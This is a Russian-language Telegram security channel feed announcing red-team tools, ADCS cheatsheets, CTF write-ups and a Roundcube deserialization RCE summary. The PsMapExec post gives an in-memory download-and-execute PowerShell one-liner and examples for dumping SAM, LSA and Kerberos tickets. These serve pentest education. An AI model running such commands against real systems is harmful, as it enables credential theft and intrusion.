Whitehat Lab
2.12K subscribers
344 photos
393 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
🦎 AdaptixC2 v0.5

Большой обзор (english)

⭐️Возможности:

Server/Client Architecture for Multiplayer Support
Cross-platform GUI client
Fully encrypted communications
Listener and Agents as Plugin (Extender)
Client extensibility for adding new tools
Task and Jobs storage
Files and Process browsers
Socks4 / Socks5 / Socks5 Auth support
Local and Reverse port forwarding support
BOF support
Linking Agents and Sessions Graph
Agents Health Checker
Agents KillDate and WorkingTime control
Windows/Linux/MacOs agents support
Remote Terminal


⚙️Установка/Запуск 💻:

sudo apt install golang-1.23 mingw-w64 make
sudo ln -s /usr/lib/go-1.23/bin/go /usr/local/bin/go

sudo apt install make cmake libssl-dev qt6-base-dev qt6-websockets-dev

git clone https://github.com/Adaptix-Framework/AdaptixC2.git
cd AdaptixC2
make server
make extenders
make client
cd dist
chmod +x ssl_gen.sh
./ssl_gen.sh

./adaptixserver -profile profile.json
./AdaptixClient


💻 Rep
💻 Extension-Kit
📔 Docs
✈️ Channel
✈️ Group

#adaptixc2 #redteam #soft

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
4411
Tab или 4 пробела ?
Anonymous Poll
76%
Tab
19%
4 пробела
5%
О чем речь ? 😅
831
🖥️ OpenIDE v2024.3.5

Для кодинга на 😰 Python много лет использовал 💻 PyCharm и меня все устраивало, но последнее время это стало немного затруднительно, чтобы обновить плагины или саму IDE, каждый раз необходимо включать VPN, а я ленивый 😅

Вот так и нашел OpenIDE, построена на базе IntelliJ IDEA, по умолчанию поддерживает Java и Kotlin (эти оба два не особо интересны😁), но после установки плагина Python Community Edition превращается в родную и любимую IDE. Обещают подвести поддержку Go и Rust, будет совсем хорошо 👍

В общем мне зашло, могу рекомендовать

🔗 Home
🔗 Download
🔗 Sources
🔗 Marketplace
🔗 OpenIDE EAP (beta)

#openide #ide #soft

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
😎 Standoff 15

Забрал вчера медальку, в этот раз красивое 👍😁

#event #standoff

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
18👍65🔥5😁2
🖼️ Репозиторий с вопросами и упражнениями по различным темам для DevOps и SRE

💻 Rep

P.S. В этом посте лаборатория с практическими заданиями

#devops #sre

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
3🔥11
Forwarded from 1N73LL1G3NC3
Delegations

A tool to work with all types of Kerberos delegations (unconstrained, constrained, and resource-based constrained delegations) in Active Directory.

Audit mode:
◦ Audit existing unconstrained delegations
◦ Audit existing constrained delegations with or without protocol transition
◦ Audit existing resource-based constrained delegations

Add mode:
◦ Add new unconstrained delegations
◦ Add new constrained delegations with or without protocol transition
◦ Add new resource-based constrained delegations

Find mode:
◦ Find unconstrained delegations
◦ Find constrained delegations with or without protocol transition
◦ Find resource-based constrained delegations

Clear mode:
◦ Clear existing unconstrained delegations
◦ Clear existing constrained delegations with or without protocol transition
◦ Clear existing resource-based constrained delegations

Remove mode:
◦ Remove existing unconstrained delegations
◦ Remove existing constrained delegations with or without protocol transition
◦ Remove existing resource-based constrained delegations

Monitor mode:
◦ Monitor modifications of all types of delegations in real-time
• Protocol transition mode:
◦ Add protocol transition on a constrained delegation
◦ Remove protocol transition on a constrained delegation
3👍2🔥1
Forwarded from Offensive Xwitter
😈 [ Aditya Telange @adityatelange ]

evil-winrm-py v1 released🌟

🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0

🐥 [ tweet ]
🙃 HTB Certified Active Directory Pentesting Expert (HTB CAPE)

Хороший товарищ пишет рецензию, очень подробный отзыв по курсу в целом и экзамену в частности

Будет ли вам интересен данный материал ? Если да, то ставим Гэндальфа 🧙

🔗 HTB CAPE

Коротко о курсе:

Интенсивный обучающий курс, который охватывает широкий спектр техник и инструментов для проведения пентеста 💻 Active Directory. Курс не предназначен для начинающих в области кибербезопасности, а вот опытные специалисты смогут найти для себя много полезного

#htb #cert #exam

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
70🔥3😁1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Полный гайд по эксплуатации ADCS от ESC1 до ESC16. Понятно, что материалов по этой теме и так много, но пусть будет под рукой))

https://xbz0n.sh/blog/adcs-complete-attack-reference

#ad #adcs #privesc #pentest #redteam
4🔥3
💻 ADCS Attack Techniques Cheatsheet

И в дополнение к предыдущему посту, сравнительная табличка по инструментам

Отличная шпаргалка по атакам на ADCS
Разобраны основные инструменты для проверки и эксплуатации уязвимостей

😹 Certipy
😹 Certify
😹 PSPKIAud
😹 LSmith
😹 BloodHound
😹 Certi
😹 Adalanche
😹 PingCastle
😹 impacket
😹 Metasploit

💻 Cheatsheet

#adcs #active_directory #windows #esc #pentest

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥71
Красивое

TAdviser сделал карту кибератак, нацеленных на Россию. Тут и цветовая разбивка по источникам, и разделение по сферам деятельности целей атак, и даже конкретные хакерские группировки указаны. Ну и описание всего этого тоже есть.

Так что смотрим, изучаем, делимся.

Пакет Безопасности | 💬 Чат
🛍 Другие каналы
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from Cybred
🔥 9.9 Critical
Post Auth RCE для Roundсube

Небезопасная десериализация. Инжектится через GET-параметр _from, — в Roundcube он указывает на раздел, куда надо вернуться, после отправки сообщения.
?_task=settings&_action=upload&_from=mail%2Finbox


Пошагово, как работает эксплоит:
1. Подменяет _from сериализованным объектом.
2. Заинжекченное значение подтягивается в сессию.
3. Дальше оно обрабатывается через rcube_pgp_engine → Crypt_GPG_Engine.
4. Во время вызова GPG-логики, Roundcube вызывает unserialize().
5. Триггерится код из первого шага

exploit // nuclei // research
🎩 Awesome Black Hat Arsenal

Курируемый список инструментов с BlackHat конференций, сгруппированный по событию (USA, Europe, Asia), году и категории

➡️ Miscellaneous / Lab Tools
➡️ Web/AppSec
➡️ Web/AppSec or Red Teaming
➡️ Red Teaming
➡️ Red Teaming / AppSec
➡️ Blue Team & Detection
➡️ Reverse Engineering
➡️ OSINT


💻 Repo

#tools #blackhat #event

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
31
😉 bloodhound-quickwin

Простой скрипт для извлечения полезных данных из Neo4j базы, которую использует Bloodhound
Наглядно выводит информацию в консоль, коротко и по делу

python3 bhqc.py -h
python3 bhqc.py -p passwordNeo4JHere -d domain.local --heavy


💻 Repo

#redteam #bloodhound #soft #python

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21
🚩 VKACTF 2025

Решения задач на прошедший VKACTF, в котором приняли участие и заняли 2ое место

💻 Райтапы
🔗 Site
🔗 Scoreboard

#ctf #vkactf2025

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥51
🔄 💻 PsMapExec v0.8.0

Отличный инструмент для пост эксплуатации в 💻 Active Directory, написанный на PowerShell.

UPD. 0.8.0
Добавили 2 метода:

LDAP / LDAPS
SSH - для дампа ключей


Начиная с версии 0.6.0, PsMapExec больше не имеет каких-либо внешних зависимостей, кроме модуля Amnesiac.
PsMapExec теперь можно запускать в ограниченных средах, таких как экзаменационные лаборатории или машины CTF

Текущая поддержка методов (протоколов):

🔵RDP
🔵SessionHunter
🔵SMB
🔵SMB Signing
🔵LDAP / LDAPS
🔵SSH
🔵Spraying
🔵VNC
🔵WinRM
🔵WMI
🔵MSSQL
🔵Kerberoast


Реализованные модули:

🔵 Amnesiac - выполнение Amnesiac C2 пейлоадов
🔵 ConsoleHistory - история в PowerShell
🔵 Files - файлы в типичных директориях
🔵 KerbDump - дамп Kerberos билетов
🔵 eKeys - дамп ключей (Mimikatz)
🔵 LogonPasswords - дамп logon passwords (Mimikatz)
🔵 LSA - дамп LSA (Mimikatz)
🔵 NTDS - реализация DCsync
🔵 SAM - дамп SAM


Запуск из памяти:

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")


Примеры:

# Текущий пользователь
PsMapExec -Targets All -Method [Method]

# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]

# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput

# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]


💻 Github
📔 Documentation

#soft #pentest #powershell #psmapexec #redteam #windows

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥321
🖼️ GoExec v0.1.2

Инструмент для удаленного выполнения команд в 💻 Windows системах, используя различные возможности ОС. Автор заверяет, что по OPSEC лучше чем аналоги в Impacket

Service Control Manager (MS-SCMR)
Task Scheduler (MS-TSCH)
Distributed Component Object Model (MS-DCOM)
Windows Management Instrumentation (MS-WMI)


💻 Repo
💻 Releases
🔗 Обзор утилиты

#goexec #redteam #soft #golang

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
31🤔1
🔄 😀 CATS v13.2.0 (Contract API Testing and Security)

Продвинутый REST API фаззер с высокой скоростью работы. Строит HTML отчеты по окончании. Очень подробная документация на официальном сайте. Написан на 💻 Java

Запуск в режиме black box:

cats --contract=openapi.yml -H "Authorization=$token" --server=https://api-url.com -b -k


Запуск в режиме context mode:

cats --contract=openapi.yaml --server=https://localhost:8080 --headers=headers.yml --refData=referenceData.yml


Запуск в режиме continuous fuzzing:

cats random --contract=openapi.yaml --server=https://localhost:8080 -H "API-KEY=$token" --mc 500 --path "/users/auth" -X POST --stopAfterTimeInSec 10


💻 Github
💻 Download
📔 Docs
📚 Тестируем Github API с CATS

#soft #cats #java #fuzzer

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
😎 Standoff 15

👍

#event #standoff

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥18🏆443
⌨️ MITRE ATT&CK Matrix v17.1

➡️ Site
➡️ Изменения
➡️ Json вариант

#mitre

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2